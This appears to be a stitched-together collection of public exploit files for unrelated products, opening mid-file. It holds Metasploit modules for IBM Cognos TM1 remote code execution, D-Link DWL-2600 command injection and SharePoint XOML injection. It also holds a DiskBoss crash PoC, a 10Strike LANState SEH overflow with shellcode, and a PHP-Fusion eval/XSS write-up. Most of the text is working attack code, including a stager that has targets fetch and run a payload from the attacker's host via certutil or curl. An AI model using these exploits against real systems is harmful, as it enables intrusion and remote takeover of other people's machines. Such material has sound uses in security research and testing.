(6) def get_auth(data) # make it into an array data = str_unpack(data) if data.length > 13 # skip 13 bytes (header + array indicator + index indicator) data.shift(13) # fetch the auth method byte data[0] end end def update_auth(auth_method, restore = false) # first byte of data is ignored, so add an extra space if restore srv_config = " IntegratedSecurityMode=#{auth_method}" else # To enable CAM server authentication over SSL, the CAM server certificate has to be previously # imported into the server. Since we can't do this, disable SSL in the fake CAM. srv_config = " IntegratedSecurityMode=#{auth_method}\n" + "ServerCAMURI=http://#{srvhost}:#{srvport}\n" + "ServerCAMURIRetryAttempts=10\nServerCAMIPVersion=ipv4\n" + "CAMUseSSL=F\n" end arr = [ 3 ] + [ 0, 0, 0, 2 ] + # no idea what this index is [ 3 ] + [ 0, 0, 0, 2 ] + # same here [ 3 ] + [ 0 ] * 4 + # same here stradd(rand_text_alpha(5..12)) + # same here... stradd("tm1s_delta.cfg") + # update file name binadd(srv_config) + # file data stradd(rand_text_alpha(0xf)) # last sync timestamp, max len 0xf upd_auth = pkt_build( MSG_TYPES[:upd_central], AUTH_OBJ_EMPTY, [ 7 ] + # array type [ 0, 0, 0, 7 ] + # array len (fixed size of 7 for this pkt) arr ) upd_auth end ## Packet primitives end ## CAM HTTP functions start def on_request_uri(cli, request) xml_res = %{<?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns1="http://developer.cognos.com/schemas/dataSourceCommandBlock/1/" xmlns:bus="http://developer.cognos.com/schemas/bibus/3/" xmlns:cm="http://developer.cognos.com/schemas/contentManagerService/1" xmlns:ns10="http://developer.cognos.com/schemas/indexUpdateService/1" xmlns:ns11="http://developer.cognos.com/schemas/jobService/1" xmlns:ns12="http://developer.cognos.com/schemas/metadataService/1" xmlns:ns13="http://developer.cognos.com/schemas/mobileService/1" xmlns:ns14="http://developer.cognos.com/schemas/monitorService/1" xmlns:ns15="http://developer.cognos.com/schemas/planningAdministrationConsoleService/1" xmlns:ns16="http://developer.cognos.com/schemas/planningRuntimeService/1" xmlns:ns17="http://developer.cognos.com/schemas/planningTaskService/1" xmlns:ns18="http://developer.cognos.com/schemas/reportService/1" xmlns:ns19="http://developer.cognos.com/schemas/systemService/1" xmlns:ns2="http://developer.cognos.com/schemas/agentService/1" xmlns:ns3="http://developer.cognos.com/schemas/batchReportService/1" xmlns:ns4="http://developer.cognos.com/schemas/dataIntegrationService/1" xmlns:ns5="http://developer.cognos.com/schemas/dataMovementService/1" xmlns:ns6="http://developer.cognos.com/schemas/deliveryService/1" xmlns:ns7="http://developer.cognos.com/schemas/dispatcher/1" xmlns:ns8="http://developer.cognos.com/schemas/eventManagementService/1" xmlns:ns9="http://developer.cognos.com/schemas/indexSearchService/1"> <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <cm:queryResponse> <result baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]"> PLACEHOLDER </result> </cm:queryResponse> </SOAP-ENV:Body> </SOAP-ENV:Envelope>} session = %Q{ <item xsi:type="bus:session"> <identity> <value baseClassArray xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="tns:baseClass[1]"> <item xsi:type="bus:account"> <searchPath><value>admin</value></searchPath> </item> </value> </identity> </item>} account = %Q{ <item xsi:type="bus:account"> <defaultName><value>admin</value></defaultName> </item>} headers = { "SOAPAction" => '"http://developer.cognos.com/schemas/contentManagerService/1"'} if request.body.include? "<searchPath>/</searchPath>" print_good("CAM: Received first CAM query, responding with account info") response = xml_res.sub('PLACEHOLDER', account) elsif request.body.include? "<searchPath>~~</searchPath>" print_good("CAM: Received second CAM query, responding with session info") response = xml_res.sub('PLACEHOLDER', session) elsif request.body.include? "<searchPath>admin</searchPath>" print_good("CAM: Received third CAM query, responding with random garbage") response = rand_text_alpha(5..12) elsif request.method == "GET" print_good("CAM: Received request for payload executable, shell incoming!") response = @pl headers = { "Content-Type" => "application/octet-stream" } else response = '' print_error("CAM: received unknown request") end send_response(cli, response, headers) end ## CAM HTTP functions end def restore_auth(app, auth_current) print_status("Restoring original authentication method #{auth_current}") upd_cent = update_auth(auth_current, true) s = get_socket(app[2], app[3], app[5]) sock_rw(s, upd_cent, true) s.close end def exploit # first let's check if SRVHOST is valid if datastore['SRVHOST'] == "0.0.0.0" fail_with(Failure::Unknown, "Please enter a valid IP address for SRVHOST") end # The first step is to query the administrative server to see what apps are available. # This action can be done unauthenticated. We then list all the available app servers # and pick a random one that is currently accepting clients. This step is important # not only to know what app servers are available, but also to know if we need to use # SSL or not. # The admin server is usually at 5498 using SSL. Non-SSL access is disabled by default, but when enabled, it's available at port 5495 # # Step 1: fetch the available applications / servers from the Admin server # ... if the user did not enter an APP_NAME if datastore['APP_NAME'].nil? connect print_status("Connecting to admin server and obtaining application data") # for this packet we use string type 0xc (?) and cut off the PKT_END pkt_control = PKT_HDR + [0] + stradd(lhost, 0xc) pkt_control = pack_sz(pkt_control.length + 2) + pkt_control data = sock_rw(sock, pkt_control) disconnect if data # now process the response apps = [] data = str_unpack(data) # ignore packet header (4 bytes) data.shift(PKT_HDR.length) # now just go through the list we received, sample format below # "24retail","tcp","10.11.12.123","17414","1460","1","127.0.0.1,127.0.0.1,127.0.0.1","1","0","","","","0","","0","","ipv4","22","0","2","http://centos7.doms.com:8014","8014" # "GO_New_Stores","tcp","10.11.12.123","45557","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","23","0","2","https://centos7.doms.com:5010","5010" # "GO_Scorecards","tcp","10.11.12.123","44321","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:44312","44312" # "Planning Sample","tcp","10.11.12.123","12345","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:12354","12354" # "proven_techniques","tcp","10.11.12.123","53333","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:5011","5011" # "SData","tcp","10.11.12.123","12346","1460","0","127.0.0.1,127.0.0.1,127.0.0.1","1","1","","","","0","","0","","ipv4","22","0","2","https://centos7.doms.com:8010","8010" while data != nil and data.length > 2 # skip the marker (0x0, 0x5) that indicates the start of a new app data = data[2..-1] # read the size and fetch the data size = (data[0..1].pack('C*').unpack('H*')[0].to_i(16)) data_next = data[2+size..-1] data = data[2..size] # first is application name app_name = get_str(data) # second is protocol, we don't care proto = get_str(data) # third is IP address ip = get_str(data) # app port port = get_str(data) # mtt maybe? don't care mtt = get_str(data) # not sure, and don't care unknown = get_str(data) # localhost addresses? again don't care unknown_addr = get_str(data) # I think this is the accepting clients flag accepts = get_str(data) # and this is a key one, the SSL flag ssl = get_str(data) # the leftover data is related to the REST API *I think*, so we just ignore it print_good("Found app #{app_name} #{proto} ip: #{ip} port: #{port} available: #{accepts} SSL: #{ssl}") apps.append([app_name, proto, ip, port.to_i, accepts.to_i, ssl.to_i]) data = data_next end else fail_with(Failure::Unknown, 'Failed to obtain application data from the admin server') end # now pick a random application server that is accepting clients via TCP app = apps.sample total = apps.length count = 0 # TODO: check for null return here, and probably also response size > 0x20 while app[1] != "tcp" and app[4] != 1 and count < total app = apps.sample count += 1 end if count == total fail_with(Failure::Unknown, 'Failed to find an application we can attack') end print_status("Picked #{app[0]} as our target, connecting...") else # else if the user entered an APP_NAME, build the app struct with that info ssl = datastore['SSL'] app = [datastore['APP_NAME'], 'tcp', rhost, rport, 1, (ssl ? 1 : 0)] print_status("Attacking #{app[0]} on #{peer} as requested with TLS #{ssl ? "on" : "off"}") end s = get_socket(app[2], app[3], app[5]) # Step 2: get the current app server configuration variables, such as the current auth method used get_conf = stradd(app[0]) get_conf += VERSION auth_get = pkt_build(MSG_TYPES[:get_config], AUTH_OBJ_EMPTY, get_conf) data = sock_rw(s, auth_get) auth_current = get_auth(data) print_good("Current auth method is #{auth_current}, we're good to go!") s.close # Step 3: start the fake CAM server / exploit server if payload.arch.include? ARCH_CMD @pl = '' else @pl = generate_payload_exe end # do not use SSL for the CAM server! if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end print_status("Starting up the fake CAM server...") start_service( { 'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => '/' }, } ) datastore['SSL'] = true if ssl_restore # Step 4: send the server config update packet, and ignore what it sends back print_status("Changing authentication method to 4 (CAM auth)") upd_cent = update_auth(4) s = get_socket(app[2], app[3], app[5]) sock_rw(s, upd_cent, true) s.close # Step 5: send the CAM auth request and obtain the authentication object # app name auth_pkt = stradd(app[0]) auth_pkt += [ 0x7, 0, 0, 0, 3 ] # array with 3 objects # passport, can be random auth_pkt += stradd(rand_text_alpha(5..12)) # no idea what these vars are, but they don't seem to matter auth_pkt += stradd(rand_text_alpha(5..12)) auth_pkt += stradd(rand_text_alpha(5..12)) # client IP auth_pkt += stradd(lhost) # add the client version number auth_pkt += VERSION auth_dist = pkt_build(MSG_TYPES[:auth_cam_pass], AUTH_OBJ_EMPTY, auth_pkt) print_status("Authenticating using CAM Passport and our fake CAM Service...") s = get_socket(app[2], app[3], app[5]) # try to authenticate up to AUTH_ATTEMPT times, but usually it works the first try # adjust the 4th parameter to sock_rw to increase the timeout if it's not working and / or the CAM server is on another network counter = 1 res_auth = '' while(counter < datastore['AUTH_ATTEMPTS']) # send the authenticate request, but wait a bit so that our fake CAM server can respond res_auth = sock_rw(s, auth_dist, false, 0.5) if res_auth.length < 20 print_error("Failed to authenticate on attempt number #{counter}, trying again...") counter += 1 next else break end end if counter == datastore['AUTH_ATTEMPTS'] # if we can't auth, bail out, but first restore the old auth method s.close #restore_auth(app, auth_current) fail_with(Failure::Unknown, "Failed to authenticate to the Application server. Run the exploit and try again!") end auth_obj = obj_extract(res_auth) # Step 6: create a Process object print_status("Creating our Process object...") proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:proc_create], auth_obj, []))) if payload.arch == ["cmd"] cmd_one = payload.encoded cmd_two = '' else payload_url = "http://#{srvhost}:#{srvport}/" exe_name = rand_text_alpha(5..13) if target['Platform'] == 'win' # the Windows command has to be split amongst two lines; the & char cannot be used to execute two processes in one line exe_name += ".exe" exe_name = "C:\\Windows\\Temp\\" + exe_name cmd_one = "certutil.exe -urlcache -split -f #{payload_url} #{exe_name}" cmd_two = exe_name else # the Linux one can actually be done in one line, but let's make them similar exe_name = "/tmp/" + exe_name cmd_one = "curl #{payload_url} -o #{exe_name};" cmd_two = "chmod +x #{exe_name}; exec #{exe_name}" end register_file_for_cleanup(exe_name) end proc_cmd = [ 0x3, 0, 0, 2, 0x3c ] + # no idea what this index is [ 0x7, 0, 0, 0, 2 ] + # array with 2 objects (2 line script) # the first argument is the command # the second whether it should wait (1) or not (0) for command completion before returning stradd("executecommand('#{cmd_one}', #{cmd_two.empty? ? "0" : "1"});") + stradd("executecommand('#{cmd_two}', 0);") # Step 7: add the commands into the process object print_status("Adding command: \"#{cmd_one}\" to the Process object...") if cmd_two != '' print_status("Adding command: \"#{cmd_two}\" to the Process object...") end sock_rw(s, pkt_build(MSG_TYPES[:obj_prop_set], [], proc_obj + proc_cmd)) # Step 8: register the Process object with a random name obj_name = rand_text_alpha(5..12) print_status("Registering the Process object under the name '#{obj_name}'") proc_obj = obj_extract(sock_rw(s, pkt_build(MSG_TYPES[:obj_register], auth_obj, proc_obj + stradd(obj_name)))) # Step 9: execute the Process! print_status("Now let's execute the Process object!") sock_rw(s, pkt_build(MSG_TYPES[:proc_exec], [], proc_obj + [ 0x7 ] + [ 0 ] * 4), true) s.close # Step 10: restore the auth method and enjoy the shell! restore_auth(app, auth_current) if payload.arch.include? ARCH_CMD print_good("Your command should have executed by now, enjoy!") end end end

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection', 'Description' => %q{ Some DLINK Access Points are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin. }, 'Author' => [ 'RAKI BEN HAMOUDA', # Vulnerability discovery and original research 'Nick Starke' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2019-20499' ], [ 'EDB', '46841' ] ], 'DisclosureDate' => 'May 15 2019', 'Privileged' => true, 'Platform' => %w{ linux unix }, 'Payload' => { 'DisableNops' => true, 'BadChars' => "\x00" }, 'CmdStagerFlavor' => :wget, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mips Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1 )) register_options( [ OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ]) ]) end def execute_command(cmd, opts={}) bogus = Rex::Text.rand_text_alpha(rand(10)) post_data = Rex::MIME::Message.new post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"") post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"") post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"") print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin.cgi'), 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => "sessionHTTP=#{@token};", 'data' => post_data.to_s, 'query' => 'action=config_restore' }) unless res || res.code != 200 fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!") end rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return end def exploit user = datastore['HttpUsername'] pass = datastore['HttpPassword'] rhost = datastore['RHOST'] rport = datastore['RPORT'] print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/admin.cgi'), 'method' => 'POST', 'vars_post' => { 'i_username' => user, 'i_password' => pass, 'login' => 'Logon' } }) unless res && res.code != 404 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end unless [200, 301, 302].include?(res.code) fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") delstart = 'var cookieValue = "' tokenoffset = res.body.index(delstart) + delstart.size endoffset = res.body.index('";', tokenoffset) @token = res.body[tokenoffset, endoffset - tokenoffset] if @token.empty? fail_with(Failure::NoAccess, "#{peer} - No Auth token received") end print_good("#{peer} - Received Auth token: #{@token}") if target.name =~ /CMD/ unless datastore['CMD'] fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end execute_command(payload.encoded) else execute_cmdstager(linemax: 100, noconcat: true) end end end

# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Powershell include Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super(update_info(info, 'Name' => 'SharePoint Workflows XOML Injection', 'Description' => %q{ This module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality. }, 'Author' => [ 'Spencer McIntyre', 'Soroush Dalili' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-0646'], ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/'] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ], [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ], [ 'Windows Powershell', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_powershell ] ], 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => '2020-03-02', 'Notes' => { 'Stability' => [CRASH_SAFE,], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], 'Reliability' => [REPEATABLE_SESSION], }, 'Privileged' => true )) register_options([ OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]), OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]), OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]), OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]) ]) end def check res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}") return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200 compiler_errors = extract_compiler_errors(res) return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0 # once patched you get a specific compiler error message about the type name return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/ CheckCode::Vulnerable end def extract_compiler_errors(res) return nil unless res&.code == 200 xml_doc = res.get_xml_document result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text return nil if result.length == 0 xml_result = Nokogiri::XML(result) xml_result.xpath('//CompilerError/@Text') end def exploit # NOTE: Automatic check is implemented by the AutoCheck mixin super case target['Type'] when :windows_command execute_command(payload.encoded) when :windows_dropper cmd_target = targets.select {|target| target['Type'] == :windows_command}.first execute_cmdstager({linemax: cmd_target.opts['Space']}) when :windows_powershell execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)) end end def escape_command(cmd) # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] } end def execute_command(cmd, opts = {}) xoml_data = <<-EOS <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages"> <workflowMarkupText> <![CDATA[ <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"> <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' /> </SequentialWorkflowActivity> ]]> </workflowMarkupText> <rulesText></rulesText> <configBlob></configBlob> <flag>2</flag> </ValidateWorkflowMarkupAndCreateSupportObjects> </soap:Body> </soap:Envelope> EOS res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'), 'ctype' => 'text/xml; charset=utf-8', 'data' => xoml_data, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }) unless res&.code == 200 print_error('Non-200 HTTP response received while trying to execute the command') end res end end

# Exploit Title: DiskBoss 7.7.14 - Denial of Service (PoC) # Date: 2020-04-01 # Exploit Author: Paras Bhatia # Vendor Homepage: https://www.diskboss.com/ # Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe # Vulnerable Software: DiskBoss # Version: 7.7.14 # Vulnerability Type: Denial of Service (DoS) Local # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: DiskbossCrash.py # 2.- Copy content to clipboard # 3.- Open "diskboss.exe" (diskbsg.exe) # 4.- Go to "Command" > Search Files # 5.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares") # 6.- Click on " Add Input Directory" # 7.- Paste ClipBoard into the "Directory" field # 8.- Click on OK # 9.- Crashed #Python "DiskbossCrash.py" Code: buffer = "\x41" * 7000 f = open ("DiskbossCrash.txt", "w") f.write(buffer) f.close()

# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH) # Date: 2020-04-01 # Exploit Author: Hodorsec # Version: v9.32 x86 # Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe # Vendor Homepage: https://www.freecommander.com # Tested on: Win7 x86 SP1 - Build 7601 # Description: # - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH. # Reproduction: # - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's. # - Run the script, a TXT file will be generated # - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c) # - Open LANState, use any "Map", for example the "demo_map" # - Click on tab "Home", click option "Check List" # - Rightclick on any existing hostname and click "Edit" # - Paste the value from clipboard in the field "Host address (name)" # - Next, Next, Finish # - In the "List of checks" overview, select the modified host and press the spacebar (Force Check) # - Check results # WinDBG initial crash output using only A's: # (c5c.c2c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000 # eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 # *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe # LANState+0x2e57: # 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] # 0:000> g # (c5c.c2c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0 # eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 # LANState+0x53e6: # 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=???????? # 0:000> g # (c5c.c2c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000 # eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 # 41414141 ?? ??? #!/usr/bin/python import sys,struct # Filename filename = "10_strike_lanstate-poc.txt" # Maximum length maxlen = 10000 # Shellcode, using alphanum chars due to bytes considered to be bad above \x7f # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode # Payload size: 447 bytes shellcode = ( "\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" "\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59" "\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e" "\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32" "\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e" "\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61" "\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56" "\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b" "\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32" "\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59" "\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43" "\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d" "\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63" "\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38" "\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76" "\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b" "\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45" "\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f" "\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c" "\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70" "\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e" "\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56" "\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75" "\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55" "\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77" "\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73" "\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41" ) # Offsets crash_ebp = 228 crash_nseh = 236 crash_seh = crash_nseh + 4 # Variables nops = "\x90" * 16 # Nops # Prefix prefix = "A" * crash_nseh # Filler nseh = "\x71\x06\x70\x04" # JNO # JO # Jump over NSEH/SEH seh = struct.pack("<L", 0x0132730f) # call dword ptr ss:[ebp-04] # [LANState.exe] suffix = nops # Old-school NOP'ing suffix += shellcode # Magic! suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler # Concatenate string for payload payload = prefix + nseh + seh + suffix # Put it all together try: file = open(filename,"wb") file.write(payload) file.close() print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully" except: print "[!] Error creating file!" sys.exit(0)

# Exploit Title: PHP-Fusion 9.03.50 - 'panels.php' Multiple vulnerability # Google Dork: N/A=20 # Date: 2020-04-01 # Exploit Author: Unkn0wn # Vendor Homepage: https://www.php-fusion.co.uk # Software Link: https://www.php-fusion.co.uk/php_fusion_9_downloads.php # Version: 9.03.50 # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- Code Execution: This vulnerabilty in "add_panel_form()" function. in line 527 we can see "eval" tag: * eval("?>".stripslashes($_POST['panel_content'])."<?php "); * and to this funcation in line 528 - 530 return us payload: * $eval =3D ob_get_contents(); ob_end_clean(); echo $eval; =09=09=09=09=09 * Demo: http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2= 2e900fb&section=3Dpanelform&action=3Dedit&panel_id=3D4 POST DATA: fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c= f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_= name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti= on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan= el_content=3D;"Code Execution Payload"&panel_access=3D0&panel_languages[]= =3DEnglish&panel_save=3DPreview Panel ---------------------------- Cross site-scripting: In line 532 with POST DATA prin"t panel_content: " echo "<p>".nl2br(parse_textarea($_POST['panel_content'], FALSE, FALSE))."</= p>\n"; " Demo: http://localhost/PHP-Fusion/files/administration/panels.php?aid=3Dae28e84e2= 2e900fb&section=3Dpanelform&action=3Dedit&panel_id=3D4 POST DATA: fusion_token=3D1-1585668386-30dc735031f57e89268287bb176e78b092e156dd32a583c= f191c7dd30c2d99e9&form_id=3Dpanel_form&fusion_PmbaJ2=3D&panel_id=3D4&panel_= name=3DWelcome Message&panel_filename=3Dnone&panel_side=3D2&panel_restricti= on=3D2&panel_url_list=3D&panel_display=3D0&panel_content-insertimage=3D&pan= el_content=3D;"<script>alert('Unkn0wn')</script>"&panel_access=3D0&panel_la= nguages[]=3DEnglish&panel_save=3DPreview Panel ---------------------------------------------------------- # Contact : [email protected] # Visit: https://t.me/l314XK205E # @ 2010 - 2020 # Underground Researcher